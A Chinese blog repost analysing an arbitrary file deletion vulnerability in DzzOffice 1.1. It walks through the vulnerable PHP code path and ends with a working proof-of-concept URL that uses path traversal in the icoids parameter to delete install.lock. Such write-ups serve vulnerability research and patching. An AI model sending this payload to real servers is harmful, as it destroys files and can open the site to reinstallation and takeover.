dzzoffice 任意文件删除漏洞分析

最新推荐文章于 2022-11-09 13:45:58 发布
最新推荐文章于 2022-11-09 13:45:58 发布
阅读量551 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/wangshuwin/p/7261952.html
版权

dzzofiice 任意文件删除漏洞

\upload\dzz\system\dzzcp.php第199行

elseif($do=='deleteIco'){
    $arr=array();
    $names=array();
    $i=0;
    $icoids=$_GET['icoids'];
    $bz=trim($_GET['bz']);
    foreach($icoids as $icoid){
        
        $return=IO::Delete($icoid);
        if(!$return['error']){
            //处理数据
            $arr['sucessicoids'][$return['icoid']]=$return['icoid'];
            $arr['msg'][$return['icoid']]='success';
            $i++;
        }else{
            $arr['msg'][$return['icoid']]=$return['error'];
        }
    }
    echo json_encode_gbk($arr);
    exit();

首先来看看$do是怎么来的
$do = empty($_GET['do'])?'':trim($_GET['do']);

只是经过了去空格的处理直接GET传入
    $icoids=$_GET['icoids'];
    $bz=trim($_GET['bz']);
这个条件中有两个变量都是直接GET传入没有什么限制

$return=IO::Delete($icoid);


这里对$icoid进行了IO类中的Delete方法处理跟进看看
function Delete($path,$realdelete=false){
        if($io=self::initIO($path))    {
                return $io->Delete($path,$realdelete);
        }
        else return false;
    }



在class_core.php文件中
class IO extends dzz_io {}



那么跟进到dzz_io类中看看
function Delete($path,$realdelete=false){
        if($io=self::initIO($path))    {
                return $io->Delete($path,$realdelete);
        }
        else return false;
    }


调用了initIO方法跟进看看(有过之前分析任意文件下载的经历这次好了很多)
protected function initIO($path){
        $bzarr=explode(':',$path);
        $allowbz=C::t('connect')->fetch_all_bz();//array('baiduPCS','ALIOSS','dzz','JSS');
        
        if(strpos($path,'dzz::')!==false){
            $classname= 'io_dzz';
        }elseif(strpos($path,'attach::')!==false){
            $classname= 'io_dzz';
        }elseif(is_numeric($bzarr[0])){
            $classname= 'io_dzz';
        }elseif(in_array($bzarr[0],$allowbz)){
            $classname= 'io_'.$bzarr[0];
        }else{
            return false;
        }
        return new $classname($path);
    }


这个方法就是对$io变量进行赋值的,反正最后的值都是$io=io_dzz
所以就变成了io_dzz->Delete
就是io_dzz类中的Delete方法

    public function Delete($icoid,$force=false){
        global $_G;
        if(strpos($icoid,'dzz::')===0){
            @unlink($_G['setting']['attachdir'].preg_replace('/^dzz::/i','',$icoid));
            return true;
        
        }elseif(strpos($icoid,'attach::')===0){
            return C::t('attachment')->delete_by_aid(intval(str_replace('attach::','',$icoid)));
        }else{
            try{
                if(!$icoarr= C::t('icos')->fetch($icoid)){
                    return array('icoid'=>$icoid,'error'=>'文件已经不存在');
                }
                if($force || $icoarr['isdelete']){
                    if(perm_check::checkperm('realdelete',$icoarr)){
                        C::t('icos')->delete_by_icoid($icoid,true);
                    }else{
                        return array('icoid'=>$icoarr['icoid'],'error'=>lang('message','no_privilege'));
                    }
                }else{
                    if(perm_check::checkperm('delete',$icoarr)){
                         C::t('icos')->update($icoid,array('isdelete'=>1,'deldateline'=>TIMESTAMP));
                         if($icoarr['type']=='folder') C::t('folder')->update($icoarr['oid'],array('isdelete'=>1,'deldateline'=>TIMESTAMP));
                    }else{
                        return array('icoid'=>$icoarr['icoid'],'error'=>lang('message','no_privilege'));
                    }
                }
                return array('icoid'=>$icoarr['icoid'],'name'=>$icoarr['name']);
            }catch(Exception $e){
                return array('error'=>$e->getMessage());
            }
        }
    }


在文件io_dzz的382到412行
下面的我都不想看了,$_G是啥我也不想管了
if(strpos($icoid,'dzz::')===0){
            @unlink($_G['setting']['attachdir'].preg_replace('/^dzz::/i','',$icoid));
            return true;
        
        }
就这样直接删了
$icoid中出现了dzz::就行了直接进行文件删除
pyload=http://127.0.0.1/dzzoffice1.1/dzzoffice1.1/index.php?mod=system&op=dzzcp&do=deleteIco&icoids[]=dzz::/../install.lock

转载于:https://www.cnblogs.com/wangshuwin/p/7261952.html

aihuochou9723
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DzzOffice办公软件 SQL注入漏洞复现(CVE-2023-39853)
0xSec
01-10 604
DzzOffice办公软件 /index.php?mod=explorer&op=dynamic&do=filelist(网盘动态功能模块)接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
dzzoffice使用说明.docx
06-22
dzzoffice
dzzoffice 任意文件下载漏洞分析
aihuochou9723的博客
07-31 893
dzzoffice 任意文件下载\updload\dzz\system\save.php第72行开始: elseif($_GET['do']=='move'){ $obz=trim($_GET['obz']); $tbz=trim($_GET['tbz']); $sourcetype=trim($_GET['sourcetype']); $icoids=ex...
Office2.02前台RCE分析
include_voidmain的博客
08-15 815
Office2.02前台RCE分析
php文件包含漏洞解决方法,DzzOffice 1.2.2 /index.php 本地文件包含漏洞
weixin_39841825的博客
03-29 792
Index.php$dzz = C::app();$mod = getgpc('mod');$mod = !empty($mod) ? $mod : '';$op = !empty($_GET['op']) ? $_GET['op'] : 'index';$cachelist = array();$dzz->cachelist = $cachelist;$dzz->init();//...
DzzOffice网盘协作系统 v1.2.5
12-07
DzzOffice是一款云存储管理程序,可以用作个人网盘、团队、企业网盘使用。通过结合更多的在线应用能够实现更多的在线协同办公的需要。DzzOffice1.2.5主要更新内容:1、增加QQ登陆支持。2、增加OneDrive支持(beta)。...
DzzOffice网盘协作系统源代码
03-18
Dzzoffice是一套开源办公套件,适用于企业、团队搭建自己的 类似“Google企业应用套件”、“微软Office365”的企业协同办公平台。套件由多个工具组成,包含但不限于如: 网盘: 企业、团队文件集中管理。主要体现的...
新版PHP仿百度网盘文件分享dzzoffice网盘系统源码
07-09
新版PHP仿百度网盘文件分享dzzoffice网盘系统源码 仅供研究学习使用!
DzzOffice+OnlyOffice安装部署手册.rar
07-23
DzzOffice+OnlyOffice安装部署手册,Markdown版说明文档。
自动删除超过3天的文件
03-23
可以删除3天以前的文件。如今天是6.29,那么会删除6.22号以前创建的文件。不会删除到回收站
dzzoffice注册开启
weixin_34061482的博客
09-15 623
2019独角兽企业重金招聘Python工程师标准>>> ...
dzzoffice网盘办公
半僧
09-16 963
http://www.dzzoffice.com/
Discuz漏洞
W_seventeen的博客
08-01 4784
1、漏洞描述 Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 3、影响版本: Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 4、利用exp,进行上传一句话木马 1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
discuz上传大文件失败(500)
秦秋雨的专栏
07-03 884
前提:已经在后台中设置了附件的文件大小,如限制500M 第一步: 打开文件后修改下面的代码 第二步: 第三部: 重启apache
DzzOffice网盘协作系统 v2.01
m0_71545166的博客
11-09 327
Dzzoffice是一套开源办公套件,适用于企业、团队搭建自己的 类似“Google企业应用套件”、“微软Office365”的企业协同办公平台。
如何集成dzzoffice
最新发布
06-12
2. 在您的项目中添加 dzzoffice 的相关文件,如 js、css 等。 3. 在您的页面中添加 dzzoffice 的容器,如一个 div。 4. 使用 JavaScript 调用 dzzoffice 提供的 API,实现您想要的功能,如打开、编辑、保存文档等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值